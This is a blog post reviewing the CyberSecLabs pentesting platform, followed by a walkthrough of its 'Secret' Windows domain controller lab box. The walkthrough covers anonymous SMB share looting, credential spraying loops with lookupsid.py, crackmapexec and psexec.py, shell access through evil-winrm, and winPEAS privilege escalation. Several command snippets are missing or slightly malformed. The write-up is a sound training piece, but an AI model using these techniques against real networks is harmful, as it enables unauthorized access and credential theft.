Last week, CyberSecLabs (cyberseclabs.co.uk) broke in to the pentesting lab scene by releasing numerous, real world lab environments meant for introductory and intermediate users alike. They offer to Hello World of boxes based on Eternal Blue, as well as other Linux and Windows machines. The lab environments are incredibly responsive and quicker to start up and access than the HTB alternative that we’ve all grown increasingly frustrated with over the last many months. The user dashboard is interactive, letting you know how many challenges and machines you’ve completed, as well as server information and more. It’s clean, well thought out, and not a confusing maze of links like you find in the HTB dashboard.
My profile/dashboard page on CyberSecLabs
As you can see, I’ve done a couple of the beginner labs, as well as a “Community Lab,” which are considered a bit more difficult than the beginner lab alternatives.
“Secret” Walkthrough
Like most other pentesting lab challenges and environments, we are met with a simple description of the machine and underlying operating system. So let’s get to work. We connect using OpenVPN and the .ovpn file we download from our dashboard, run it, and click the start button on the machine (where the stop button is above).
Information Gathering
The first thing we need to do is get an understanding of our target machine by running:
We can quickly determine by the returned information that we are looking at a Windows Server/Domain Controller.
Great! We have some information that we can use. SMB is running on 139/445, Kerberos is running on 88, and we can glean some information about the Domain Controller domain SECRET.org.
Enumeration and First Low Privilege Hash
Now that we have some information to go off of, let’s start poking around a bit. Starting at the easiest targets and moving outward, we begin with enumerating the SMB service by running:
As we can see, there are several options, however one sticks out: Office_Share. Let’s run the following smbclient command in hopes that it allows anonymous login:
This is great, and a common misconfiguration by many system administrators. Further enumeration shows us that there are several user directories available, which should be noted.
Now that we know there are directories available, we can traverse them manually, however I’ve chosen to download the directories and their contents directly to my Kali machine using:
recurse ON
prompt OFF
mget *
We can also see a couple of .txt documents while downloading (due to setting recursiveness to on). On inspection of the downloaded directory, we can clearly see a password, however we don’t know who or what it belongs to.
So we have a password, and a bunch of user directories, but no idea what to do with them. We can try using a tool called lookupsid.py which allows us to enumerate valid usernames from a single valid user ran through the tool. However, this would take time to do manually. Alternatively, we can create a simple script in Bash to run a larger username list we create ourselves based on the directory names we located earlier.
Now that we have our list of possible usernames, we can go to work utilizing lookupsid.py, using the following command:
for user in $(cat users.txt); do lookupsid.py SECRET/$user:’<insert that password we found>’@172.31.2.1
If you used the above example username list, you will see that the 8th attempt was successful. Please make note of this name, as I will not give it away. We also need to keep track of the usernames enumerated from running lookupsid.py as these may be leveraged in the future.
Method #2
We can utilize a tool called crackmapexec to enumerate users until we find the correct one. The command to do so is as follows:
crackmapexec smb 172.31.2.1 -u users.txt -p <passwordhere>
Knowing the username and password, we can attempt to login using psexec.py, however this proves to be unsuccessful as there are no shares that are writeable by this user. A bit of search around, however, shows us a tool called “evil-winrm,” which takes advantage of Windows Remote Management that is running on the earlier discovered port 5985, provided we have user credentials to do so. Luckily, we have discovered those credentials. We can run the following command, which will give us a Powershell command shell for the user we know currently:
evil-winrm -i 172.31.2.1 -u <username> -p <password>
A simple directory traversal to the Desktop of this user gives us our first flag, access.txt. Use the “more access.txt” command to reveal the hash and submit it to the dashboard.
We can traverse to the other user directories, however we quickly figure out that the users are privileged, and we are unable to access the directories.
Privilege Escalation
As it’s become apparent we have no access to the higher privileged directories, we need another way in. A bit of research suggests that “winPEAS” may be a suitable choice, and we need to go about uploading it to the target machine. We can do this using the upload command inside of the evil-winrm command prompt using the following command:
upload winPEAS.exe
(note you will need to adjust your directory location accordingly)
Before we get to work utilizing winPEAS.exe, we first need to prepare it for use in the Powershell prompt by typing the following:
“C:\Users\<usernamehere>\Desktop\winPEAS.exe
(adjust the directory location based on where you uploaded it to)
Once you have prepared winPEAS.exe to be used, you can run it using the following:
. .\winPEAS.exe
The next part can take several minutes to complete. Once it does, scroll through the information you find. One part should particularly stand out as it is a “Default Password.” Note this as we will need it to take control of the system.
Armed with this new found password, we can modify our earlier lookupsid.py script, replacing it with psexec. Being as we aren’t sure if the password belongs to another user, or which one if it does, we can simply insert the new password where the old one was, and run it.
for user in $(cat users.txt); do psexec.py SECRET/$user:’<newpassword’@172.31.2.1; done
We start to get output like we did the first time, however psexec.py gives us a command shell when it finds the correct user associated with the password. You can count the number of attempts required, and then look back at your username list to determine which user it belongs to.
We can finally traverse to the Administrator user Desktop directory, and find our hard earned, shiny system.txt flag. Capture it, and submit the hash on the dashboard and you have completed the challenge.
Method #2
Utilizing crackmapexec, we can use the new found password, and add it to our password list and run it. This will reveal username and password credentials if any exist, using the following command:
crackmapexec smb 172.31.2.1 -u /root/Desktop/users.txt -p /root/Desktop/passes.txt
We then use psexec.py to gain an elevated command shell on the machine, where we can finish our tasks. Use the following:
psexec.py <username>:’<password>’@172.31.2.1
